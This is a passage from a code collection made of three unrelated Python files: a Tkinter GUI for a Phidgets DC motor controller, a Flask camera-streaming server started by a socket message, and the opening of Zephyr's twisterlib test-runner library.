orient=HORIZONTAL,\
borderwidth=2,\
showvalue=1,\
width=self.TkinterScaleWidth,\
length=self.TkinterScaleLength,\
resolution=0.001,\
variable=self.Velocity_PhidgetsUnits_ScaleValue)
self.Velocity_PhidgetsUnits_Scale.bind('<Button-1>', lambda event, name="Velocity": self.Velocity_PhidgetsUnits_ScaleResponse(event, name)) #Use both '<Button-1>' or '<ButtonRelease-1>'
self.Velocity_PhidgetsUnits_Scale.bind('<B1-Motion>', lambda event, name="Velocity": self.Velocity_PhidgetsUnits_ScaleResponse(event, name))
self.Velocity_PhidgetsUnits_Scale.bind('<ButtonRelease-1>', lambda event, name="Velocity": self.Velocity_PhidgetsUnits_ScaleResponse(event, name)) #Use both '<Button-1>' or '<ButtonRelease-1>'
self.Velocity_PhidgetsUnits_Scale.set(self.Velocity_PhidgetsUnits_TO_BE_SET)
self.Velocity_PhidgetsUnits_Scale.grid(row=2, column=2, padx=1, pady=1, columnspan=2, rowspan=1)
self.Velocity_PhidgetsUnits_Scale["troughcolor"] = self.TKinter_LightGreenColor
#if self.ControlMode == "position":
# self.Velocity_PhidgetsUnits_Scale["state"] = "disabled"
#elif self.ControlMode == "velocity":
# self.Velocity_PhidgetsUnits_Scale["troughcolor"] = self.TKinter_LightGreenColor
#################################################
#################################################
self.Acceleration_PhidgetsUnits_ScaleLabel = Label(self.myFrame, text="Acceleration", width=20)
self.Acceleration_PhidgetsUnits_ScaleLabel.grid(row=3, column=1, padx=1, pady=1, columnspan=1, rowspan=1)
self.Acceleration_PhidgetsUnits_ScaleValue = DoubleVar()
self.Acceleration_PhidgetsUnits_Scale = Scale(self.myFrame, \
from_=self.AccelerationMinLimit_PhidgetsUnits_FromDevice,\
to=self.AccelerationMaxLimit_PhidgetsUnits_UserSet, \
#tickinterval=(self.Acceleration_PhidgetsUnits_max - self.Acceleration_PhidgetsUnits_min) / 2.0,\
orient=HORIZONTAL,\
borderwidth=2,\
showvalue=1,\
width=self.TkinterScaleWidth,\
length=self.TkinterScaleLength,\
resolution=0.001,\
variable=self.Acceleration_PhidgetsUnits_ScaleValue)
self.Acceleration_PhidgetsUnits_Scale.bind('<Button-1>', lambda event, name="Acceleration": self.Acceleration_PhidgetsUnits_ScaleResponse(event, name)) #Use both '<Button-1>' or '<ButtonRelease-1>'
self.Acceleration_PhidgetsUnits_Scale.bind('<B1-Motion>', lambda event, name="Acceleration": self.Acceleration_PhidgetsUnits_ScaleResponse(event, name))
self.Acceleration_PhidgetsUnits_Scale.bind('<ButtonRelease-1>', lambda event, name="Acceleration": self.Acceleration_PhidgetsUnits_ScaleResponse(event, name)) #Use both '<Button-1>' or '<ButtonRelease-1>'
self.Acceleration_PhidgetsUnits_Scale.set(self.Acceleration_PhidgetsUnits_TO_BE_SET)
self.Acceleration_PhidgetsUnits_Scale.grid(row=3, column=2, padx=1, pady=1, columnspan=2, rowspan=1)
if self.ControlMode == "position":
pass #Color gets controlled by engaged flag within the main GUI loop
elif self.ControlMode == "velocity":
self.Acceleration_PhidgetsUnits_Scale["troughcolor"] = self.TKinter_LightGreenColor
#################################################
#################################################
self.DeadBand_PosControl_PhidgetsUnits_ScaleLabel = Label(self.myFrame, text="DeadBand", width=20)
self.DeadBand_PosControl_PhidgetsUnits_ScaleLabel.grid(row=4, column=1, padx=1, pady=1, columnspan=1, rowspan=1)
# self.DeadBandMinLimit_PhidgetsUnits_UserSet,\ #self.DeadBandMaxLimit_PhidgetsUnits_UserSet, \
self.DeadBand_PosControl_PhidgetsUnits_ScaleValue = DoubleVar()
self.DeadBand_PosControl_PhidgetsUnits_Scale = Scale(self.myFrame, \
from_=0,\
to= self.PositionMaxLimit_PhidgetsUnits_UserSet,\
#tickinterval=(self.DeadBand_PosControl_PhidgetsUnits_max - self.DeadBand_PosControl_PhidgetsUnits_min) / 2.0,\
orient=HORIZONTAL,\
borderwidth=2,\
showvalue=1,\
width=self.TkinterScaleWidth,\
length=self.TkinterScaleLength,\
resolution=0.1,\
variable=self.DeadBand_PosControl_PhidgetsUnits_ScaleValue)
self.DeadBand_PosControl_PhidgetsUnits_Scale.bind('<Button-1>', lambda event, name="DeadBand": self.DeadBand_PosControl_PhidgetsUnits_ScaleResponse(event, name)) #Use both '<Button-1>' or '<ButtonRelease-1>'
self.DeadBand_PosControl_PhidgetsUnits_Scale.bind('<B1-Motion>', lambda event, name="DeadBand": self.DeadBand_PosControl_PhidgetsUnits_ScaleResponse(event, name))
self.DeadBand_PosControl_PhidgetsUnits_Scale.bind('<ButtonRelease-1>', lambda event, name="DeadBand": self.DeadBand_PosControl_PhidgetsUnits_ScaleResponse(event, name)) #Use both '<Button-1>' or '<ButtonRelease-1>'
self.DeadBand_PosControl_PhidgetsUnits_Scale.set(self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET)
self.DeadBand_PosControl_PhidgetsUnits_Scale.grid(row=4, column=2, padx=1, pady=1, columnspan=2, rowspan=1)
if self.ControlMode == "velocity":
self.DeadBand_PosControl_PhidgetsUnits_Scale["state"] = "disabled"
#################################################
'''
###########################################################
###########################################################
self.Entry_Width = 15
self.Entry_Label_Width = 15
self.Entry_FontSize = 8
self.AllEntriesFrame = Frame(self.myFrame)
self.AllEntriesFrame["borderwidth"] = 2
#self.AllEntriesFrame["relief"] = "ridge"
self.AllEntriesFrame.grid(row=2, column=0, padx=1, pady=1, columnspan=10, rowspan=1, sticky="W")
###########################################################
###########################################################
###########################################################
###########################################################
self.VelocityMaxLimit_PhidgetsUnits_label = Label(self.AllEntriesFrame, text="VelocityMax", width=self.Entry_Label_Width)
self.VelocityMaxLimit_PhidgetsUnits_label.grid(row=0, column=0, padx=1, pady=1, columnspan=1, rowspan=1)
self.VelocityMaxLimit_PhidgetsUnits_StringVar = StringVar()
self.VelocityMaxLimit_PhidgetsUnits_StringVar.set(self.VelocityMaxLimit_PhidgetsUnits_UserSet)
self.VelocityMaxLimit_PhidgetsUnits_TextInputBox = Entry(self.AllEntriesFrame,
font=("Helvetica", int(self.Entry_FontSize)),
state="normal",
width=int(self.Entry_Width),
textvariable=self.VelocityMaxLimit_PhidgetsUnits_StringVar,
justify='center')
self.VelocityMaxLimit_PhidgetsUnits_TextInputBox.bind('<Return>', lambda event, name = "<Return>": self.VelocityMaxLimit_PhidgetsUnits_TextInputBoxResponse(event, name))
#self.VelocityMaxLimit_PhidgetsUnits_TextInputBox.bind('<Button-1>', lambda event, name = "<Button-1>": self.VelocityMaxLimit_PhidgetsUnits_TextInputBoxResponse(event, name))
#self.VelocityMaxLimit_PhidgetsUnits_TextInputBox.bind('<Button-2>', lambda event, name = "<Button-2>": self.VelocityMaxLimit_PhidgetsUnits_TextInputBoxResponse(event, name))
#self.VelocityMaxLimit_PhidgetsUnits_TextInputBox.bind('<Button-3>', lambda event, name = "<Button-3>": self.VelocityMaxLimit_PhidgetsUnits_TextInputBoxResponse(event, name))
#self.VelocityMaxLimit_PhidgetsUnits_TextInputBox.bind('<Leave>', lambda event, name = "<Leave>": self.VelocityMaxLimit_PhidgetsUnits_TextInputBoxResponse(event, name))
self.VelocityMaxLimit_PhidgetsUnits_TextInputBox.grid(row=1, column=0, padx=0, pady=0, columnspan=1, rowspan=1)
###########################################################
###########################################################
'''
###########################################################
###########################################################
self.Button_Width = 15
self.AllButtonsFrame = Frame(self.myFrame)
self.AllButtonsFrame["borderwidth"] = 2
#self.AllButtonsFrame["relief"] = "ridge"
self.AllButtonsFrame.grid(row=0, column=2, padx=1, pady=1, columnspan=1, rowspan=1, sticky="W")
###########################################################
###########################################################
###########################################################
###########################################################
self.HomeMotorInPlaceButton = Button(self.AllButtonsFrame, text='HomeInPlace', state="normal", width=self.Button_Width, command=lambda i=1: self.HomeMotorInPlaceButtonResponse())
self.HomeMotorInPlaceButton.grid(row=0, column=0, padx=1, pady=1, columnspan=1, rowspan=1)
if self.ControlMode == "position":
self.HomeMotorInPlaceButton["bg"] = self.TKinter_LightGreenColor
elif self.ControlMode == "velocity":
self.HomeMotorInPlaceButton["state"] = "disabled"
###########################################################
###########################################################
###########################################################
###########################################################
self.EngagedStateButton = Button(self.AllButtonsFrame, text='Engaged: x', state="normal", width=self.Button_Width, command=lambda i=1: self.EngagedStateButtonResponse())
self.EngagedStateButton.grid(row=0, column=1, padx=1, pady=1, columnspan=1, rowspan=1)
if self.ControlMode == "velocity":
self.EngagedStateButton["state"] = "disabled"
###########################################################
###########################################################
###########################################################
###########################################################
self.StopMotorButton = Button(self.AllButtonsFrame, text='Stop Motor', state="normal", width=self.Button_Width, command=lambda i=1: self.StopMotorButtonResponse())
self.StopMotorButton.grid(row=0, column=2, padx=1, pady=1, columnspan=1, rowspan=1)
self.StopMotorButton["bg"] = self.TKinter_LightGreenColor
###########################################################
###########################################################
########################
if self.RootIsOwnedExternallyFlag == 0: #This class object owns root and must handle it properly
self.root.protocol("WM_DELETE_WINDOW", self.ExitProgram_Callback)
self.root.after(self.GUI_RootAfterCallbackInterval_Milliseconds, self.GUI_update_clock)
self.GUI_ready_to_be_updated_flag = 1
self.root.mainloop()
else:
self.GUI_ready_to_be_updated_flag = 1
########################
########################
if self.RootIsOwnedExternallyFlag == 0: #This class object owns root and must handle it properly
self.root.quit() # Stop the GUI thread, MUST BE CALLED FROM GUI_Thread
self.root.destroy() # Close down the GUI thread, MUST BE CALLED FROM GUI_Thread
########################
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def Position_PhidgetsUnits_ScaleResponse(self, event, name):
self.Position_PhidgetsUnits_TO_BE_SET = self.Position_PhidgetsUnits_ScaleValue.get()
self.Position_PhidgetsUnits_NeedsToBeChangedFlag = 1
#self.MyPrint_WithoutLogFile("Position_PhidgetsUnits_ScaleResponse: Position set to: " + str(self.Position_PhidgetsUnits_TO_BE_SET))
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def Velocity_PhidgetsUnits_ScaleResponse(self, event, name):
self.Velocity_PhidgetsUnits_TO_BE_SET = self.Velocity_PhidgetsUnits_ScaleValue.get()
self.Velocity_PhidgetsUnits_NeedsToBeChangedFlag = 1
#self.MyPrint_WithoutLogFile("Velocity_PhidgetsUnits_ScaleResponse: Velocity set to: " + str(self.Velocity_PhidgetsUnits_TO_BE_SET))
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def Acceleration_PhidgetsUnits_ScaleResponse(self, event, name):
self.Acceleration_PhidgetsUnits_TO_BE_SET = self.Acceleration_PhidgetsUnits_ScaleValue.get()
self.Acceleration_PhidgetsUnits_NeedsToBeChangedFlag = 1
#self.MyPrint_WithoutLogFile("Acceleration_PhidgetsUnits_ScaleResponse: Acceleration set to: " + str(self.Acceleration_PhidgetsUnits_TO_BE_SET))
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def DeadBand_PosControl_PhidgetsUnits_ScaleResponse(self, event, name):
self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET = self.DeadBand_PosControl_PhidgetsUnits_ScaleValue.get()
self.DeadBand_PosControl_PhidgetsUnits_NeedsToBeChangedFlag = 1
#self.MyPrint_WithoutLogFile("DeadBand_PosControl_PhidgetsUnits_ScaleResponse: DeadBand set to: " + str(self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET))
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def SetEngagedState(self, StateToBeSet):
if StateToBeSet not in [0, 1]:
self.MyPrint_WithoutLogFile("SetEngagedState ERROR: StateToBeSet must be 0 or 1.")
return 0
else:
self.EngagedState_TO_BE_SET = StateToBeSet
self.EngagedState_NeedsToBeChangedFlag = 1
return 1
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def EngagedStateButtonResponse(self):
if self.EngagedState_PhidgetsUnits_FromDevice == 1:
self.SetEngagedState(0)
else:
self.SetEngagedState(1)
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def StopMotorButtonResponse(self):
self.StopMotor_NeedsToBeChangedFlag = 1
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def HomeMotorInPlaceButtonResponse(self):
self.HomeMotorInPlace_NeedsToBeHomedFlag = 1
##########################################################################################################
##########################################################################################################
'''
##########################################################################################################
##########################################################################################################
def VelocityMaxLimit_PhidgetsUnits_TextInputBoxResponse(self, event=None, name="default"):
try:
if name == "<Button-1>" or name == "<Button-2>" or name == "<Button-3>" or name == "<Leave>":
pass
elif name == "<Return>": # When user hits 'Return'
VelocityMaxLimit_PhidgetsUnits_UserSet_temp = float(self.VelocityMaxLimit_PhidgetsUnits_StringVar.get())
self.VelocityMaxLimit_PhidgetsUnits_UserSet = self.LimitNumber_StringVarObject(
-1.0 * self.VelocityMaxLimit_PhidgetsUnits_FromDevice,
self.VelocityMaxLimit_PhidgetsUnits_FromDevice,
VelocityMaxLimit_PhidgetsUnits_UserSet_temp,
self.VelocityMaxLimit_PhidgetsUnits_StringVar)
self.MyPrint_WithoutLogFile("VelocityMaxLimit_PhidgetsUnits_TextInputBoxResponse 'Return' event: \n" + str(
self.VelocityMaxLimit_PhidgetsUnits_UserSet))
self.Velocity_PhidgetsUnits_TO_BE_SET = self.VelocityMaxLimit_PhidgetsUnits_UserSet
self.Velocity_PhidgetsUnits_NeedsToBeChangedFlag = 1
except:
pass
##########################################################################################################
##########################################################################################################
'''
##########################################################################################################
##########################################################################################################
def GUI_update_clock(self):
#######################################################
#######################################################
#######################################################
#######################################################
if self.USE_GUI_FLAG == 1 and self.EXIT_PROGRAM_FLAG == 0:
#######################################################
#######################################################
#######################################################
if self.GUI_ready_to_be_updated_flag == 1:
#######################################################
#######################################################
try:
#########################################################
self.EngagedStateButton["text"] = "Engaged: " + str(self.EngagedState_PhidgetsUnits_FromDevice)
if self.EngagedState_PhidgetsUnits_FromDevice == 0:
self.EngagedStateButton["bg"] = self.TKinter_LightRedColor
elif self.EngagedState_PhidgetsUnits_FromDevice == 1:
self.EngagedStateButton["bg"] = self.TKinter_LightGreenColor
else:
self.EngagedStateButton["bg"] = self.TKinter_DefaultGrayColor
#########################################################
#########################################################
if self.ControlMode == "position":
if self.EngagedState_PhidgetsUnits_FromDevice == 1:
self.Position_PhidgetsUnits_Scale["troughcolor"] = self.TKinter_LightGreenColor
self.Acceleration_PhidgetsUnits_Scale["troughcolor"] = self.TKinter_LightGreenColor
self.DeadBand_PosControl_PhidgetsUnits_Scale["troughcolor"] = self.TKinter_LightGreenColor
else:
self.Position_PhidgetsUnits_Scale["troughcolor"] = self.TKinter_LightRedColor
self.Acceleration_PhidgetsUnits_Scale["troughcolor"] = self.TKinter_LightRedColor
self.DeadBand_PosControl_PhidgetsUnits_Scale["troughcolor"] = self.TKinter_LightRedColor
#########################################################
#########################################################
if self.Position_PhidgetsUnits_GUI_NeedsToBeChangedFlag == 1:
self.Position_PhidgetsUnits_Scale.set(self.Position_PhidgetsUnits_TO_BE_SET)
self.Position_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 0
#########################################################
#########################################################
if self.Velocity_PhidgetsUnits_GUI_NeedsToBeChangedFlag == 1:
self.Velocity_PhidgetsUnits_Scale.set(self.Velocity_PhidgetsUnits_TO_BE_SET)
self.Velocity_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 0
#########################################################
#########################################################
if self.Acceleration_PhidgetsUnits_GUI_NeedsToBeChangedFlag == 1:
self.Acceleration_PhidgetsUnits_Scale.set(self.Acceleration_PhidgetsUnits_TO_BE_SET)
self.Acceleration_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 0
#########################################################
#########################################################
if self.DeadBand_PosControl_PhidgetsUnits_GUI_NeedsToBeChangedFlag == 1:
self.DeadBand_PosControl_PhidgetsUnits_Scale.set(self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET)
self.DeadBand_PosControl_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 0
#########################################################
#######################################################
self.data_label["text"] = "*** ControlMode: " + self.ControlMode + " ***" +\
"\nTime: " + self.ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self.CurrentTime_CalculatedFromMainThread, 0, 3) + \
"\nFrequency MainThread(Hz): " + self.ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self.DataStreamingFrequency_CalculatedFromMainThread, 0, 3) + \
"\nFrequency Phidgets ON CHANGE Position Rx, can slow to 0 (Hz): " + self.ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self.DataStreamingFrequency_OnPositionChangeCallbackFunction, 0, 3) + \
"\nTemperature_DegC_FromDevice: " + self.ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self.Temperature_DegC_FromDevice, 0, 3) + \
"\nPosition_PhidgetsUnits_FromDevice: " + self.ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self.Position_PhidgetsUnits_FromDevice, 0, 3) + \
"\nVelocity_PhidgetsUnits_FromDevice: " + self.ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self.Velocity_PhidgetsUnits_FromDevice, 0, 3) + \
"\nVelocityStall_PhidgetsUnits_FromDevice: " + self.ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self.VelocityStall_PhidgetsUnits_FromDevice, 0, 3) + \
"\nDutyCycle_PhidgetsUnits_FromDevice: " + self.ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self.DutyCycle_PhidgetsUnits_FromDevice, 0, 3) + \
"\nAcceleration_PhidgetsUnits_FromDevice: " + self.ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self.Acceleration_PhidgetsUnits_FromDevice, 0, 3) + \
"\nDeadBand_PosControl_PhidgetsUnits_FromDevice: " + self.ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self.DeadBand_PosControl_PhidgetsUnits_FromDevice, 0, 3) + \
"\nEngagedState_PhidgetsUnits_FromDevice: " + self.ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self.EngagedState_PhidgetsUnits_FromDevice, 0, 3)
#"\n***Position_PhidgetsUnits_TO_BE_SET: " + str(self.Position_PhidgetsUnits_TO_BE_SET)
#######################################################
#######################################################
self.PrintToGui_Label.config(text=self.PrintToGui_Label_TextInput_Str)
#######################################################
except:
exceptions = sys.exc_info()[0]
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class GUI_update_clock ERROR: Exceptions: %s" % exceptions)
traceback.print_exc()
#######################################################
#######################################################
#######################################################
#######################################################
if self.RootIsOwnedExternallyFlag == 0: # This class object owns root and must handle it properly
self.root.after(self.GUI_RootAfterCallbackInterval_Milliseconds, self.GUI_update_clock)
#######################################################
#######################################################
#######################################################
#######################################################
#######################################################
#######################################################
#######################################################
#######################################################
#######################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def IsInputList(self, input, print_result_flag = 0):
result = isinstance(input, list)
if print_result_flag == 1:
self.MyPrint_WithoutLogFile("IsInputList: " + str(result))
return result
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self, input, number_of_leading_numbers=4, number_of_decimal_places=3):
IsListFlag = self.IsInputList(input)
if IsListFlag == 0:
float_number_list = [input]
else:
float_number_list = list(input)
float_number_list_as_strings = []
for element in float_number_list:
try:
element = float(element)
prefix_string = "{:." + str(number_of_decimal_places) + "f}"
element_as_string = prefix_string.format(element)
float_number_list_as_strings.append(element_as_string)
except:
self.MyPrint_WithoutLogFile(self.TellWhichFileWereIn() + ": ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput ERROR: " + str(element) + " cannot be turned into a float")
return -1
StringToReturn = ""
if IsListFlag == 0:
StringToReturn = float_number_list_as_strings[0].zfill(number_of_leading_numbers + number_of_decimal_places + 1 + 1) # +1 for sign, +1 for decimal place
else:
StringToReturn = "["
for index, StringElement in enumerate(float_number_list_as_strings):
if float_number_list[index] >= 0:
StringElement = "+" + StringElement # So that our strings always have either + or - signs to maintain the same string length
StringElement = StringElement.zfill(number_of_leading_numbers + number_of_decimal_places + 1 + 1) # +1 for sign, +1 for decimal place
if index != len(float_number_list_as_strings) - 1:
StringToReturn = StringToReturn + StringElement + ", "
else:
StringToReturn = StringToReturn + StringElement + "]"
return StringToReturn
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def limitNumber(self, min_val, max_val, test_val):
#test_val = float(test_val) #MUST HAVE THIS LINE TO CATCH STRINGS PASSED INTO THE FUNCTION
if test_val > max_val:
test_val = max_val
#self.MyPrint_WithoutLogFile("limitNumber: input of " + str(test_val) + " was capped at maximum of " + str(max_val) + ".")
elif test_val < min_val:
test_val = min_val
#self.MyPrint_WithoutLogFile("limitNumber: input of " + str(test_val) + " was capped at minimum of " + str(min_val) + ".")
else:
dummy_var = 0
#self.MyPrint_WithoutLogFile("limitNumber ERROR: input of " + str(test_val) + " triggered the 'else' condition.")
return test_val
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def LimitNumber_StringVarObject(self, min_val, max_val, test_val, StringVarObject, number_of_decimal_places = 1):
try:
test_val = float(test_val)
if test_val > max_val:
test_val = max_val
#self.MyPrint_WithoutLogFile("Original input of " + str(test_val) + " capped at a maximum of " + str(max_val))
elif test_val < min_val:
test_val = min_val
#self.MyPrint_WithoutLogFile("Original input of " + str(test_val) + " capped at a minimum of " + str(min_val))
else:
test_val = test_val
#self.MyPrint_WithoutLogFile("Original input of " + str(test_val) + " not capped at a minimum of " + str(min_val) + " or maximum of " + str(max_val))
prefix_string = "{:." + str(number_of_decimal_places) + "f}"
string_to_set = prefix_string.format(test_val)
StringVarObject.set(str(string_to_set)) # Reset the text, overwriting the bad value that was entered.
return test_val
except:
exceptions = sys.exc_info()[0]
self.MyPrint_WithoutLogFile("LimitNumber_StringVarObject ERROR: Exceptions: %s" % exceptions)
return -1111111111
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def MyPrint_WithoutLogFile(self, input_string):
input_string = str(input_string)
if input_string != "":
#input_string = input_string.replace("\n", "").replace("\r", "")
################################ Write to console
# Some people said that print crashed for pyinstaller-built-applications and that sys.stdout.write fixed this.
# http://stackoverflow.com/questions/13429924/pyinstaller-packaged-application-works-fine-in-console-mode-crashes-in-window-m
if self.PrintToConsoleFlag == 1:
sys.stdout.write(input_string + "\n")
################################
################################ Write to GUI
self.PrintToGui_Label_TextInputHistory_List.append(self.PrintToGui_Label_TextInputHistory_List.pop(0)) #Shift the list
self.PrintToGui_Label_TextInputHistory_List[-1] = str(input_string) #Add the latest value
self.PrintToGui_Label_TextInput_Str = ""
for Counter, Line in enumerate(self.PrintToGui_Label_TextInputHistory_List):
self.PrintToGui_Label_TextInput_Str = self.PrintToGui_Label_TextInput_Str + Line
if Counter < len(self.PrintToGui_Label_TextInputHistory_List) - 1:
self.PrintToGui_Label_TextInput_Str = self.PrintToGui_Label_TextInput_Str + "\n"
################################
##########################################################################################################
##########################################################################################################
|
face_streaming_server.py
|
import cv2
import time
import threading
from flask import Response, Flask
import time
import os
import sys
import socket
import select
# Flask 객체로 Image frame 전달
global video_frame
video_frame = None
# 다양한 브라우저에서 프레임들의 thread-safe 출력을 잠근다.
global thread_lock
thread_lock = threading.Lock()
# Raspberry Camera에 접근하기 위한 GStreamer 파이프라인
GSTREAMER_PIPELINE = 'nvarguscamerasrc ! video/x-raw(memory:NVMM), width=1920, height=1080, format=(string)NV12, framerate=21/1 ! nvvidconv flip-method=0 ! video/x-raw, width=960, height=616, format=(string)BGRx ! videoconvert ! video/x-raw, format=(string)BGR ! appsink wait-on-eos=false max-buffers=1 drop=True'
# 어플리케이션을 위한 Flask 오브젝트 생성
app = Flask(__name__)
def restart():
print("프로그램 재시작")
executable = sys.executable
args = sys.argv[:]
args.insert(0, sys.executable)
time.sleep(1)
os.execvp(executable, args)
def captureFrames():
global video_frame, thread_lock
start_time = time.time()
# OpenCV로부터 비디오 캡처
video_capture = cv2.VideoCapture(GSTREAMER_PIPELINE, cv2.CAP_GSTREAMER)
while True and video_capture.isOpened():
return_key, frame = video_capture.read()
duration = time.time() - start_time
if not return_key:
break
# 프레임의 복사본을 생성하고 video_frame 변수에 저장
with thread_lock:
video_frame = frame.copy()
key = cv2.waitKey(30) & 0xff
if key == 27:
break
if duration >= 30:
print("20초 경과")
video_capture.release()
restart()
break
video_capture.release()
def encodeFrame():
global thread_lock
while True:
# video_frame 변수에 접근하기 위한 thread_lock 습득
with thread_lock:
global video_frame
if video_frame is None:
continue
return_key, encoded_image = cv2.imencode(".jpg", video_frame)
if not return_key:
continue
# 바이트 배열로 결과 이미지
yield (b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' +
bytearray(encoded_image) + b'\r\n')
@app.route("/")
def streamFrames():
return Response(encodeFrame(), mimetype="multipart/x-mixed-replace; boundary=frame")
if __name__ == '__main__':
IP = '192.168.0.50'
PORT = 5040
ADDR = (IP, PORT)
SIZE = 1024
Server_socket1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Server_socket1.bind(ADDR)
Server_socket1.listen()
read_socket_list = [Server_socket1]
conn_read_socket_list, conn_write_socket_list, conn_except_socket_list =select.select(read_socket_list, [], [])
for conn_read_socket in conn_read_socket_list:
if conn_read_socket == Server_socket1:
client_socket, client_addr = Server_socket1.accept()
msg = client_socket.recv(SIZE)
if msg.decode('UTF-8') == 'A':
print("실행합니다.")
# thread를 생성하고 이미지 프레임을 캡처하는 메소드를 첨가
process_thread = threading.Thread(target=captureFrames)
process_thread.daemon = True
# Start the thread
process_thread.start()
# start the Flask Web Application
# While it can be run on any feasible IP, IP = 192.168.0.50 renders the web app on
# the host machine's localhost and is discoverable by other machines on the same network
app.run("192.168.0.50", port="8000")
|
twisterlib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import math
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import hashlib
import threading
from datetime import datetime
from collections import OrderedDict
import queue
import time
import csv
import glob
import random
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
import json
from multiprocessing import Lock, Process, Value
from typing import List
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
try:
import pty
except ImportError as capture_error:
if os.name == "nt": # "nt" means that program is running on Windows OS
pass # "--device-serial-pty" option is not supported on Windows OS
else:
raise capture_error
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts",
"python-devicetree", "src"))
from devicetree import edtlib # pylint: disable=unused-import
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
import scl
import expr_parser
logger = logging.getLogger('twister')
logger.setLevel(logging.DEBUG)
class ExecutionCounter(object):
def __init__(self, total=0):
self._done = Value('i', 0)
self._passed = Value('i', 0)
self._skipped_configs = Value('i', 0)
self._skipped_runtime = Value('i', 0)
self._skipped_filter = Value('i', 0)
self._skipped_cases = Value('i', 0)
self._error = Value('i', 0)
self._failed = Value('i', 0)
self._total = Value('i', total)
self._cases = Value('i', 0)
self.lock = Lock()
def summary(self):
logger.debug("--------------------------------")
logger.debug(f"Total Test suites: {self.total}")
logger.debug(f"Total Test cases: {self.cases}")
logger.debug(f"Skipped test cases: {self.skipped_cases}")
logger.debug(f"Completed Testsuites: {self.done}")
logger.debug(f"Passing Testsuites: {self.passed}")
logger.debug(f"Failing Testsuites: {self.failed}")
logger.debug(f"Skipped Testsuites: {self.skipped_configs}")
logger.debug(f"Skipped Testsuites (runtime): {self.skipped_runtime}")
logger.debug(f"Skipped Testsuites (filter): {self.skipped_filter}")
logger.debug(f"Errors: {self.error}")
logger.debug("--------------------------------")
@property
def cases(self):
with self._cases.get_lock():
return self._cases.value
@cases.setter
def cases(self, value):
with self._cases.get_lock():
self._cases.value = value
@property
def skipped_cases(self):
with self._skipped_cases.get_lock():
return self._skipped_cases.value
@skipped_cases.setter
def skipped_cases(self, value):
with self._skipped_cases.get_lock():
self._skipped_cases.value = value
@property
def error(self):
with self._error.get_lock():
return self._error.value
@error.setter
def error(self, value):
with self._error.get_lock():
self._error.value = value
@property
def done(self):
with self._done.get_lock():
return self._done.value
@done.setter
def done(self, value):
with self._done.get_lock():
self._done.value = value
@property
def passed(self):
with self._passed.get_lock():
return self._passed.value
@passed.setter
def passed(self, value):
with self._passed.get_lock():
self._passed.value = value
@property
def skipped_configs(self):
with self._skipped_configs.get_lock():
return self._skipped_configs.value
@skipped_configs.setter
